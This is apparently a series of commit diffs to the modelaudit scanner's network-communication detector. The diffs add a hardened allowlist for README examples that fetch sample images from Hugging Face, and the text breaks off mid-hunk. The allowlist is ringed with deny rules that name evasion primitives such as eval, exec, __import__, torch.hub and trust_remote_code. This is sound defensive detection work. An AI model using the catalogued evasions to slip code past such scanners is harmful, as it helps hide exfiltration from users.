### PR TITLE
fix: recognize bounded official image downloads in model cards

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,12 +7,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
-### Fixed
-
-- Avoid network false positives for bounded README examples that download sample images over HTTPS from Hugging Face.
-
 ### Bug Fixes
 
+- Avoid network false positives for bounded README examples that download sample images over HTTPS from Hugging Face.
 - Prevent Windows cache identity probes from creating locked temporary files inside scanned directories.
 
 ## [0.2.52](https://github.com/promptfoo/modelaudit/compare/v0.2.51...v0.2.52) (2026-07-22)

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -10,6 +10,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 ### Fixed
 
 - Avoid network false positives for bounded README examples that download sample images over HTTPS from Hugging Face.
+
 ### Bug Fixes
 
 - Prevent Windows cache identity probes from creating locked temporary files inside scanned directories.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Fixed
+
+- Avoid network false positives for bounded README examples that download sample images over HTTPS from Hugging Face.
+
 ## [0.2.52](https://github.com/promptfoo/modelaudit/compare/v0.2.51...v0.2.52) (2026-07-22)
 
 ### Bug Fixes

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1970,6 +1970,13 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     protected_names.update(
         call.args[0].id for call in requests_calls if len(call.args) == 1 and isinstance(call.args[0], ast.Name)
     )
+    callable_assignments = {
+        target.id
+        for statement in tree.body
+        if isinstance(statement, ast.Assign) and isinstance(statement.value, ast.Call)
+        for target in statement.targets
+        if isinstance(target, ast.Name)
+    }
     allowed_targets: set[int] = set()
     assignments: dict[str, list[tuple[int, str | None]]] = {}
     for statement in tree.body:
@@ -1985,15 +1992,16 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     for node in nodes:
         if isinstance(node, ast.Import):
             for alias in node.names:
+                imported_name = alias.asname or alias.name.split(".", maxsplit=1)[0]
                 if (
                     alias.name.split(".", maxsplit=1)[0] in {"builtins", "importlib", "sys"}
-                    or alias.asname == "requests"
+                    or (imported_name in protected_names and not (alias.name == "requests" and node in imports))
                     or (alias.name == "requests" and node not in imports)
                 ):
                     return False
         if isinstance(node, ast.ImportFrom) and (
             (node.module or "").split(".", maxsplit=1)[0] in {"builtins", "importlib", "requests", "sys"}
-            or any(alias.name == "*" or alias.name == "requests" or alias.asname == "requests" for alias in node.names)
+            or any(alias.name == "*" or (alias.asname or alias.name) in protected_names for alias in node.names)
         ):
             return False
         if isinstance(node, ast.Match):
@@ -2032,6 +2040,12 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return False
         if isinstance(node, ast.ExceptHandler) and node.name in protected_names:
             return False
+        if (
+            isinstance(node, ast.Call)
+            and isinstance(node.func, ast.Name)
+            and node.func.id not in callable_assignments | {"enumerate", "len", "print", "range", "round", "zip"}
+        ):
+            return False
         if isinstance(node, ast.Attribute) and node.attr in {"eval", "exec", "__import__"}:
             return False
         if (
@@ -2054,6 +2068,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 "delattr",
                 "vars",
                 "__import__",
+                "__builtins__",
             }
         ):
             return False

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1909,21 +1909,11 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
     ):
         return False
 
-    assignments: dict[str, list[tuple[int, str | None]]] = {}
-    for node in nodes:
-        if isinstance(node, ast.Assign):
-            for target in node.targets:
-                if isinstance(target, ast.Name):
-                    value = node.value.value if isinstance(node.value, ast.Constant) else None
-                    assignments.setdefault(target.id, []).append(
-                        (node.lineno, value if isinstance(value, str) else None)
-                    )
-
     requests_calls: list[ast.Call] = []
     for node in nodes:
         if not isinstance(node, ast.Attribute) or not isinstance(node.value, ast.Name) or node.value.id != "requests":
             continue
-        if node.attr != "get":
+        if node.attr != "get" or not isinstance(node.ctx, ast.Load):
             return False
     for node in nodes:
         if (
@@ -1937,18 +1927,66 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
     if not requests_calls:
         return False
 
+    protected_names = {"requests"}
+    protected_names.update(
+        call.args[0].id for call in requests_calls if len(call.args) == 1 and isinstance(call.args[0], ast.Name)
+    )
+    allowed_targets: set[int] = set()
+    assignments: dict[str, list[tuple[int, str | None]]] = {}
+    for statement in tree.body:
+        if not isinstance(statement, ast.Assign):
+            continue
+        for target in statement.targets:
+            if isinstance(target, ast.Name) and target.id in protected_names and target.id != "requests":
+                allowed_targets.add(id(target))
+                value = statement.value.value if isinstance(statement.value, ast.Constant) else None
+                assignments.setdefault(target.id, []).append(
+                    (statement.lineno, value if isinstance(value, str) else None)
+                )
+    for node in nodes:
+        if (
+            isinstance(node, ast.Name)
+            and node.id in protected_names
+            and isinstance(node.ctx, ast.Store)
+            and id(node) not in allowed_targets
+        ):
+            return False
+        if isinstance(node, ast.arg) and node.arg in protected_names:
+            return False
+        if isinstance(node, ast.ExceptHandler) and node.name in protected_names:
+            return False
+        if (
+            isinstance(node, ast.Call)
+            and isinstance(node.func, ast.Name)
+            and node.func.id
+            in {
+                "eval",
+                "exec",
+                "globals",
+                "locals",
+                "setattr",
+            }
+        ):
+            return False
+
     for call in requests_calls:
-        if len(call.args) != 1 or any(
-            keyword.arg != "stream" or not isinstance(keyword.value, ast.Constant) or keyword.value.value is not True
-            for keyword in call.keywords
+        if (
+            len(call.args) != 1
+            or len(call.keywords) != 1
+            or any(
+                keyword.arg != "stream"
+                or not isinstance(keyword.value, ast.Constant)
+                or keyword.value.value is not True
+                for keyword in call.keywords
+            )
         ):
             return False
         argument = call.args[0]
         if isinstance(argument, ast.Constant) and isinstance(argument.value, str):
             url = argument.value
         elif isinstance(argument, ast.Name):
-            bindings = [binding for binding in assignments.get(argument.id, []) if binding[0] < call.lineno]
-            if len(bindings) != 1 or bindings[0][1] is None:
+            bindings = assignments.get(argument.id, [])
+            if len(bindings) != 1 or bindings[0][0] >= call.lineno or bindings[0][1] is None:
                 return False
             url = bindings[0][1]
         else:

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2032,6 +2032,14 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return False
         if isinstance(node, ast.ExceptHandler) and node.name in protected_names:
             return False
+        if isinstance(node, ast.Attribute) and node.attr in {"eval", "exec", "__import__"}:
+            return False
+        if (
+            isinstance(node, ast.Subscript)
+            and isinstance(node.slice, ast.Constant)
+            and node.slice.value in {"eval", "exec", "__import__"}
+        ):
+            return False
         if (
             isinstance(node, ast.Name)
             and isinstance(node.ctx, ast.Load)

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -8,12 +8,14 @@ import ast
 import ipaddress
 import math
 import re
+import tokenize
 from bisect import bisect_right
 from collections import Counter
 from collections.abc import Iterator
 from contextlib import suppress
 from functools import lru_cache
 from importlib.resources import files
+from io import BytesIO
 from typing import Any, ClassVar
 from urllib.parse import unquote, unquote_plus, urlsplit, urlunsplit
 
@@ -1731,8 +1733,9 @@ _MAX_README_IMAGE_EXAMPLE_BYTES = 64 * 1024
 _MAX_README_IMAGE_EXAMPLE_AST_NODES = 1024
 _MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS = 64
 _MAX_README_IMAGE_EXAMPLE_FENCES = 256
-_PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?P<fence>`{3,})(?:python|py)[ \t]*\r?\n")
-_README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}`{3,}[ \t]*\r?$")
+_PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?P<fence>`{3,}|~{3,})(?:python|py)[ \t]*\r?\n")
+_README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?:`{3,}|~{3,})[ \t]*\r?$")
+_QUALIFIED_REQUESTS_CALL_PATTERN = re.compile(rb"\brequests\s*\.\s*[A-Za-z_][A-Za-z_0-9]*\s*\(")
 _DOCUMENTED_IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".webp", ".gif", ".bmp")
 _WORD_PATTERN = re.compile(rb"[A-Za-z]{2,}")
 _CALL_SYNTAX_SUFFIX_PATTERN = re.compile(rb"(?:[\s)]|#[^\n]*\n)*\(")
@@ -1959,11 +1962,50 @@ def _index_official_readme_sample_image_fences(
             and b"requests.get" in example
             and _is_valid_official_readme_sample_image_example(example)
         )
-        if b"requests" in example and not is_safe:
+        if not is_safe and _contains_executable_requests_reference(example):
             unvalidated_requests = True
         fences.append((opening.end(), closing.start(), is_safe))
         cursor = closing.end()
+    outside_start = 0
+    for fence_start, fence_end, _is_safe in fences:
+        if _contains_executable_requests_reference(data[outside_start:fence_start]):
+            unvalidated_requests = True
+            break
+        outside_start = fence_end
+    if not unvalidated_requests and _contains_executable_requests_reference(data[outside_start:]):
+        unvalidated_requests = True
     return fences, unvalidated_requests
+
+
+def _contains_executable_requests_reference(data: bytes) -> bool:
+    if b"requests" not in data:
+        return False
+    if len(data) <= _MAX_README_IMAGE_EXAMPLE_BYTES:
+        try:
+            tree = ast.parse(data.decode("utf-8"))
+        except (SyntaxError, UnicodeDecodeError, RecursionError, ValueError):
+            pass
+        else:
+            return any(
+                isinstance(node, ast.Name) and node.id == "requests" and isinstance(node.ctx, ast.Load)
+                for node in ast.walk(tree)
+            )
+
+    for checked_matches, match in enumerate(_QUALIFIED_REQUESTS_CALL_PATTERN.finditer(data)):
+        if checked_matches >= _MAX_README_IMAGE_EXAMPLE_AST_NODES:
+            return True
+        line_start = data.rfind(b"\n", 0, match.start()) + 1
+        line_end = data.find(b"\n", match.end())
+        line = data[line_start : len(data) if line_end < 0 else line_end]
+        if len(line) > _MAX_README_IMAGE_EXAMPLE_BYTES:
+            return True
+        try:
+            tokens = list(tokenize.tokenize(BytesIO(line).readline))
+        except (tokenize.TokenError, UnicodeDecodeError, SyntaxError):
+            return True
+        if any(token.type == tokenize.NAME and token.string == "requests" for token in tokens):
+            return True
+    return False
 
 
 def _is_readme_image_example_context(context: str) -> bool:
@@ -1983,7 +2025,7 @@ def _matching_readme_image_fence_end(
     cursor = start
     while closing := _README_FENCE_END_PATTERN.search(data, cursor, end):
         delimiter = data[closing.start() : closing.end()].strip(b" \t\r")
-        if len(delimiter) >= opening_width:
+        if delimiter[:1] == opening.group("fence")[:1] and len(delimiter) >= opening_width:
             return closing
         cursor = closing.end()
     return None
@@ -2078,17 +2120,57 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         | {node.arg for node in nodes if isinstance(node, ast.arg)}
         | {node.name for node in nodes if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))}
     )
-    requests_response_names = {
-        target.id
-        for statement in tree.body
-        if isinstance(statement, ast.Assign)
-        and isinstance(statement.value, ast.Call)
-        and isinstance(statement.value.func, ast.Attribute)
-        and isinstance(statement.value.func.value, ast.Name)
-        and statement.value.func.value.id == "requests"
-        and statement.value.func.attr == "get"
-        for target in statement.targets
-        if isinstance(target, ast.Name)
+    requests_response_names: set[str] = set()
+    binding_nodes = sorted(
+        (node for node in nodes if isinstance(node, (ast.Assign, ast.AnnAssign, ast.NamedExpr, ast.withitem))),
+        key=lambda node: (
+            getattr(node, "lineno", getattr(node.context_expr, "lineno", 0))
+            if isinstance(node, ast.withitem)
+            else node.lineno
+        ),
+    )
+    for node in binding_nodes:
+        response_bindings: list[tuple[ast.expr, ast.expr | None]] = []
+        if isinstance(node, ast.Assign):
+            response_bindings.extend((target, node.value) for target in node.targets)
+        elif isinstance(node, (ast.AnnAssign, ast.NamedExpr)):
+            response_bindings.append((node.target, node.value))
+        elif node.optional_vars is not None:
+            response_bindings.append((node.optional_vars, node.context_expr))
+        for target, response_value in response_bindings:
+            if not isinstance(target, ast.Name) or response_value is None:
+                continue
+            is_documented_image_open = (
+                isinstance(response_value, ast.Call)
+                and isinstance(response_value.func, ast.Attribute)
+                and isinstance(response_value.func.value, ast.Name)
+                and response_value.func.value.id == "Image"
+                and response_value.func.attr == "open"
+            )
+            if not is_documented_image_open and any(
+                child in requests_calls
+                or (
+                    isinstance(child, ast.Name)
+                    and isinstance(child.ctx, ast.Load)
+                    and child.id in requests_response_names
+                )
+                for child in ast.walk(response_value)
+            ):
+                requests_response_names.add(target.id)
+    documented_attribute_calls = {
+        "batch_decode",
+        "convert",
+        "from_pretrained",
+        "generate",
+        "is_available",
+        "item",
+        "no_grad",
+        "open",
+        "post_process_generation",
+        "post_process_object_detection",
+        "tensor",
+        "to",
+        "tolist",
     }
     allowed_targets: set[int] = set()
     assignments: dict[str, list[tuple[int, str | None]]] = {}
@@ -2167,6 +2249,15 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         ):
             return False
         if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
+            if node not in requests_calls and node.func.attr not in documented_attribute_calls:
+                return False
+            if node.func.attr == "from_pretrained" and any(
+                keyword.arg == "trust_remote_code"
+                and isinstance(keyword.value, ast.Constant)
+                and keyword.value.value is True
+                for keyword in node.keywords
+            ):
+                return False
             attribute_root = node.func.value
             while isinstance(attribute_root, (ast.Attribute, ast.Subscript, ast.Call)):
                 if isinstance(attribute_root, ast.Call) and attribute_root in requests_calls:
@@ -2174,6 +2265,18 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 attribute_root = attribute_root.func if isinstance(attribute_root, ast.Call) else attribute_root.value
             if isinstance(attribute_root, ast.Name) and attribute_root.id in (
                 requests_response_names | documented_builtin_names
+            ):
+                return False
+            if (
+                node.func.attr == "open"
+                and isinstance(node.func.value, ast.Name)
+                and node.func.value.id == "Image"
+                and not (
+                    len(node.args) == 1
+                    and isinstance(node.args[0], ast.Attribute)
+                    and node.args[0].attr == "raw"
+                    and node.args[0].value in requests_calls
+                )
             ):
                 return False
         if isinstance(node, ast.Call) and not isinstance(node.func, (ast.Attribute, ast.Name)):

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -4,6 +4,7 @@ This module detects potential network communication capabilities in model files
 that could be used for data exfiltration or command & control operations.
 """
 
+import ast
 import ipaddress
 import math
 import re
@@ -1726,6 +1727,11 @@ _EXPLICIT_PROSE_PREFIX_PATTERN = re.compile(
     re.IGNORECASE,
 )
 _MAX_PROSE_LINE_CONTEXT_BYTES = 512
+_MAX_README_IMAGE_EXAMPLE_BYTES = 64 * 1024
+_MAX_README_IMAGE_EXAMPLE_AST_NODES = 1024
+_PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```(?:python|py)[ \t]*\r?\n")
+_README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```[ \t]*\r?$")
+_DOCUMENTED_IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".webp", ".gif", ".bmp")
 _WORD_PATTERN = re.compile(rb"[A-Za-z]{2,}")
 _CALL_SYNTAX_SUFFIX_PATTERN = re.compile(rb"(?:[\s)]|#[^\n]*\n)*\(")
 _CODE_LINE_PREFIXES: tuple[bytes, ...] = (
@@ -1868,6 +1874,102 @@ def _is_doc_only_network_reference(
     if not has_prose_marker:
         return False
     return (metadata_context and word_count >= 4) or word_count >= 6
+
+
+def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, context: str) -> bool:
+    if len(data) > _MAX_README_IMAGE_EXAMPLE_BYTES:
+        return False
+    filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
+    if filename != "readme.md":
+        return False
+
+    example: bytes | None = None
+    for opening in _PYTHON_README_FENCE_PATTERN.finditer(data):
+        if opening.end() > match_index:
+            break
+        closing = _README_FENCE_END_PATTERN.search(data, opening.end())
+        if closing is not None and opening.end() <= match_index < closing.start():
+            example = data[opening.end() : closing.start()]
+            break
+    if example is None:
+        return False
+    try:
+        tree = ast.parse(example.decode("utf-8"))
+    except (SyntaxError, UnicodeDecodeError, RecursionError, ValueError):
+        return False
+
+    nodes = list(ast.walk(tree))
+    if len(nodes) > _MAX_README_IMAGE_EXAMPLE_AST_NODES:
+        return False
+    imports = [
+        node for node in nodes if isinstance(node, ast.Import) for alias in node.names if alias.name == "requests"
+    ]
+    if not imports or any(
+        alias.asname is not None for node in imports for alias in node.names if alias.name == "requests"
+    ):
+        return False
+
+    assignments: dict[str, list[tuple[int, str | None]]] = {}
+    for node in nodes:
+        if isinstance(node, ast.Assign):
+            for target in node.targets:
+                if isinstance(target, ast.Name):
+                    value = node.value.value if isinstance(node.value, ast.Constant) else None
+                    assignments.setdefault(target.id, []).append(
+                        (node.lineno, value if isinstance(value, str) else None)
+                    )
+
+    requests_calls: list[ast.Call] = []
+    for node in nodes:
+        if not isinstance(node, ast.Attribute) or not isinstance(node.value, ast.Name) or node.value.id != "requests":
+            continue
+        if node.attr != "get":
+            return False
+    for node in nodes:
+        if (
+            isinstance(node, ast.Call)
+            and isinstance(node.func, ast.Attribute)
+            and isinstance(node.func.value, ast.Name)
+            and node.func.value.id == "requests"
+            and node.func.attr == "get"
+        ):
+            requests_calls.append(node)
+    if not requests_calls:
+        return False
+
+    for call in requests_calls:
+        if len(call.args) != 1 or any(
+            keyword.arg != "stream" or not isinstance(keyword.value, ast.Constant) or keyword.value.value is not True
+            for keyword in call.keywords
+        ):
+            return False
+        argument = call.args[0]
+        if isinstance(argument, ast.Constant) and isinstance(argument.value, str):
+            url = argument.value
+        elif isinstance(argument, ast.Name):
+            bindings = [binding for binding in assignments.get(argument.id, []) if binding[0] < call.lineno]
+            if len(bindings) != 1 or bindings[0][1] is None:
+                return False
+            url = bindings[0][1]
+        else:
+            return False
+        try:
+            parsed = urlsplit(url)
+        except ValueError:
+            return False
+        segments = parsed.path.split("/")
+        if (
+            parsed.scheme != "https"
+            or parsed.hostname not in _PUBLIC_MODEL_REPOSITORY_HOSTS
+            or parsed.netloc != parsed.hostname
+            or parsed.fragment
+            or parsed.query not in {"", "download=true"}
+            or "resolve" not in segments
+            or any(segment in {".", ".."} for segment in segments)
+            or not parsed.path.lower().endswith(_DOCUMENTED_IMAGE_SUFFIXES)
+        ):
+            return False
+    return True
 
 
 class NetworkCommDetector:
@@ -2892,6 +2994,9 @@ class NetworkCommDetector:
                         token_len=len(pattern),
                         context=context,
                         requires_call=not pattern.startswith((b"import ", b"from ")),
+                    ) or (
+                        lib == b"requests"
+                        and _is_official_readme_sample_image_request(data, match_index=match_index, context=context)
                     ):
                         continue
 
@@ -2931,6 +3036,9 @@ class NetworkCommDetector:
                     token_len=len(func),
                     context=context,
                     requires_call=True,
+                ) or (
+                    func == b"requests.get"
+                    and _is_official_readme_sample_image_request(data, match_index=idx, context=context)
                 ):
                     continue
 

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1877,17 +1877,20 @@ def _is_doc_only_network_reference(
 
 
 def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, context: str) -> bool:
-    if len(data) > _MAX_README_IMAGE_EXAMPLE_BYTES:
-        return False
     filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
     if filename != "readme.md":
         return False
 
     example: bytes | None = None
-    for opening in _PYTHON_README_FENCE_PATTERN.finditer(data):
+    window_start = max(0, match_index - _MAX_README_IMAGE_EXAMPLE_BYTES)
+    for opening in _PYTHON_README_FENCE_PATTERN.finditer(data, window_start, match_index + 1):
         if opening.end() > match_index:
             break
-        closing = _README_FENCE_END_PATTERN.search(data, opening.end())
+        closing = _README_FENCE_END_PATTERN.search(
+            data,
+            opening.end(),
+            min(len(data), opening.end() + _MAX_README_IMAGE_EXAMPLE_BYTES),
+        )
         if closing is not None and opening.end() <= match_index < closing.start():
             example = data[opening.end() : closing.start()]
             break
@@ -1901,6 +1904,7 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
     nodes = list(ast.walk(tree))
     if len(nodes) > _MAX_README_IMAGE_EXAMPLE_AST_NODES:
         return False
+    parents = {id(child): parent for parent in nodes for child in ast.iter_child_nodes(parent)}
     imports = [
         node for node in nodes if isinstance(node, ast.Import) for alias in node.names if alias.name == "requests"
     ]
@@ -1913,7 +1917,13 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
     for node in nodes:
         if not isinstance(node, ast.Attribute) or not isinstance(node.value, ast.Name) or node.value.id != "requests":
             continue
-        if node.attr != "get" or not isinstance(node.ctx, ast.Load):
+        parent = parents.get(id(node))
+        if (
+            node.attr != "get"
+            or not isinstance(node.ctx, ast.Load)
+            or not isinstance(parent, ast.Call)
+            or parent.func is not node
+        ):
             return False
     for node in nodes:
         if (
@@ -1993,13 +2003,17 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
             return False
         try:
             parsed = urlsplit(url)
+            port = parsed.port
         except ValueError:
             return False
         segments = parsed.path.split("/")
         if (
             parsed.scheme != "https"
             or parsed.hostname not in _PUBLIC_MODEL_REPOSITORY_HOSTS
-            or parsed.netloc != parsed.hostname
+            or parsed.username is not None
+            or parsed.password is not None
+            or port is not None
+            or parsed.netloc.lower() != parsed.hostname
             or parsed.fragment
             or parsed.query not in {"", "download=true"}
             or "resolve" not in segments

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1730,6 +1730,7 @@ _MAX_PROSE_LINE_CONTEXT_BYTES = 512
 _MAX_README_IMAGE_EXAMPLE_BYTES = 64 * 1024
 _MAX_README_IMAGE_EXAMPLE_AST_NODES = 1024
 _MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS = 64
+_MAX_README_IMAGE_EXAMPLE_FENCES = 256
 _PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```(?:python|py)[ \t]*\r?\n")
 _README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```[ \t]*\r?$")
 _DOCUMENTED_IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".webp", ".gif", ".bmp")
@@ -1883,10 +1884,17 @@ def _is_official_readme_sample_image_request(
     match_index: int,
     context: str,
     fence_cache: list[tuple[int, int, bool]],
+    preindexed: bool = False,
 ) -> bool:
     filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
     if filename not in {"readme.md", "readme"}:
         return False
+    if preindexed:
+        fence_index = bisect_right(fence_cache, (match_index, len(data), True)) - 1
+        if fence_index < 0:
+            return False
+        fence_start, fence_end, is_safe = fence_cache[fence_index]
+        return fence_start <= match_index < fence_end and is_safe
     for fence_start, fence_end, is_safe in reversed(fence_cache):
         if fence_start <= match_index < fence_end:
             return is_safe
@@ -1920,6 +1928,42 @@ def _is_official_readme_sample_image_request(
         fence_cache.pop(0)
     fence_cache.append((example_start, example_end, is_safe))
     return is_safe
+
+
+def _index_official_readme_sample_image_fences(
+    data: bytes,
+    context: str,
+) -> tuple[list[tuple[int, int, bool]], bool]:
+    filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
+    if filename not in {"readme.md", "readme"} or b"requests" not in data:
+        return [], False
+
+    fences: list[tuple[int, int, bool]] = []
+    unvalidated_requests = False
+    cursor = 0
+    while opening := _PYTHON_README_FENCE_PATTERN.search(data, cursor):
+        if len(fences) >= _MAX_README_IMAGE_EXAMPLE_FENCES:
+            return [], True
+        closing = _README_FENCE_END_PATTERN.search(
+            data,
+            opening.end(),
+            min(len(data), opening.end() + _MAX_README_IMAGE_EXAMPLE_BYTES),
+        )
+        if closing is None:
+            unvalidated_requests = True
+            cursor = min(len(data), opening.end() + _MAX_README_IMAGE_EXAMPLE_BYTES)
+            continue
+        example = data[opening.end() : closing.start()]
+        is_safe = (
+            b"import requests" in example
+            and b"requests.get" in example
+            and _is_valid_official_readme_sample_image_example(example)
+        )
+        if b"requests" in example and not is_safe:
+            unvalidated_requests = True
+        fences.append((opening.end(), closing.start(), is_safe))
+        cursor = closing.end()
+    return fences, unvalidated_requests
 
 
 def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
@@ -2052,6 +2096,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return False
         if isinstance(node, ast.Match):
             return False
+        if isinstance(node, (ast.Assert, ast.Lambda, ast.Raise, ast.Try)):
+            return False
         if isinstance(node, ast.ClassDef):
             return False
         if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)) and (
@@ -2098,9 +2144,21 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             attribute_root = node.func.value
             while isinstance(attribute_root, (ast.Attribute, ast.Subscript, ast.Call)):
                 attribute_root = attribute_root.func if isinstance(attribute_root, ast.Call) else attribute_root.value
-            if isinstance(attribute_root, ast.Name) and attribute_root.id in requests_response_names:
+            if isinstance(attribute_root, ast.Name) and attribute_root.id in (
+                requests_response_names | documented_builtin_names
+            ):
                 return False
-        if isinstance(node, ast.Attribute) and node.attr in {"eval", "exec", "__import__"}:
+        if isinstance(node, ast.Call) and not isinstance(node.func, (ast.Attribute, ast.Name)):
+            return False
+        if isinstance(node, ast.Attribute) and (
+            node.attr.startswith("_")
+            or node.attr in {"eval", "exec", "load_library"}
+            or (
+                isinstance(node.value, ast.Name)
+                and node.value.id == "torch"
+                and node.attr in {"classes", "compile", "hub", "jit", "ops", "package", "serialization", "utils"}
+            )
+        ):
             return False
         if (
             isinstance(node, ast.Subscript)
@@ -2527,6 +2585,7 @@ class NetworkCommDetector:
         self._evidence_redaction_limit_reached = False
         self._cloud_nested_url_findings: set[str] = set()
         self._official_readme_image_fences: list[tuple[int, int, bool]] = []
+        self._official_readme_image_unvalidated_requests = False
 
         # Clone class-level patterns to avoid cross-instance leakage
         self.cc_patterns: list[bytes] = self.CC_PATTERNS.copy()
@@ -2558,7 +2617,10 @@ class NetworkCommDetector:
         self._evidence_redaction_classifications = 0
         self._evidence_redaction_limit_reached = False
         self._cloud_nested_url_findings = set()
-        self._official_readme_image_fences = []
+        (
+            self._official_readme_image_fences,
+            self._official_readme_image_unvalidated_requests,
+        ) = _index_official_readme_sample_image_fences(data, context)
         if self.max_findings is None:
             self._url_contexts = self._index_url_contexts(data)
             self._url_context_starts = [start for start, _end, _url in self._url_contexts]
@@ -3198,11 +3260,13 @@ class NetworkCommDetector:
                         requires_call=not pattern.startswith((b"import ", b"from ")),
                     ) or (
                         lib == b"requests"
+                        and not self._official_readme_image_unvalidated_requests
                         and _is_official_readme_sample_image_request(
                             data,
                             match_index=match_index,
                             context=context,
                             fence_cache=self._official_readme_image_fences,
+                            preindexed=True,
                         )
                     ):
                         continue
@@ -3250,6 +3314,7 @@ class NetworkCommDetector:
                         match_index=idx,
                         context=context,
                         fence_cache=self._official_readme_image_fences,
+                        preindexed=True,
                     )
                 ):
                     continue

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1731,8 +1731,8 @@ _MAX_README_IMAGE_EXAMPLE_BYTES = 64 * 1024
 _MAX_README_IMAGE_EXAMPLE_AST_NODES = 1024
 _MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS = 64
 _MAX_README_IMAGE_EXAMPLE_FENCES = 256
-_PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```(?:python|py)[ \t]*\r?\n")
-_README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```[ \t]*\r?$")
+_PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?P<fence>`{3,})(?:python|py)[ \t]*\r?\n")
+_README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}`{3,}[ \t]*\r?$")
 _DOCUMENTED_IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".webp", ".gif", ".bmp")
 _WORD_PATTERN = re.compile(rb"[A-Za-z]{2,}")
 _CALL_SYNTAX_SUFFIX_PATTERN = re.compile(rb"(?:[\s)]|#[^\n]*\n)*\(")
@@ -1886,8 +1886,7 @@ def _is_official_readme_sample_image_request(
     fence_cache: list[tuple[int, int, bool]],
     preindexed: bool = False,
 ) -> bool:
-    filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
-    if filename not in {"readme.md", "readme"}:
+    if not _is_readme_image_example_context(context):
         return False
     if preindexed:
         fence_index = bisect_right(fence_cache, (match_index, len(data), True)) - 1
@@ -1911,8 +1910,9 @@ def _is_official_readme_sample_image_request(
     for opening in openings:
         if opening.end() > match_index:
             break
-        closing = _README_FENCE_END_PATTERN.search(
+        closing = _matching_readme_image_fence_end(
             data,
+            opening,
             opening.end(),
             min(len(data), opening.end() + _MAX_README_IMAGE_EXAMPLE_BYTES),
         )
@@ -1934,8 +1934,7 @@ def _index_official_readme_sample_image_fences(
     data: bytes,
     context: str,
 ) -> tuple[list[tuple[int, int, bool]], bool]:
-    filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
-    if filename not in {"readme.md", "readme"} or b"requests" not in data:
+    if not _is_readme_image_example_context(context) or b"requests" not in data:
         return [], False
 
     fences: list[tuple[int, int, bool]] = []
@@ -1944,8 +1943,9 @@ def _index_official_readme_sample_image_fences(
     while opening := _PYTHON_README_FENCE_PATTERN.search(data, cursor):
         if len(fences) >= _MAX_README_IMAGE_EXAMPLE_FENCES:
             return [], True
-        closing = _README_FENCE_END_PATTERN.search(
+        closing = _matching_readme_image_fence_end(
             data,
+            opening,
             opening.end(),
